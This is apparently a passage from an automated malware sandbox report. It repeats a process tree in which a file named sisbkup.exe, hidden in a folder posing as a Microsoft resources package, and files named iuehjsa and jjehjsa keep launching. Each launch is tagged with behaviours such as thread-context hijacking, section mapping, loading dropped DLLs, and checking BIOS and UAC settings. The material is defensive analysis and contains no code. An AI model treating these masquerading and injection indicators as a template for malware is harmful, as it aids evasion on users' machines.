- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
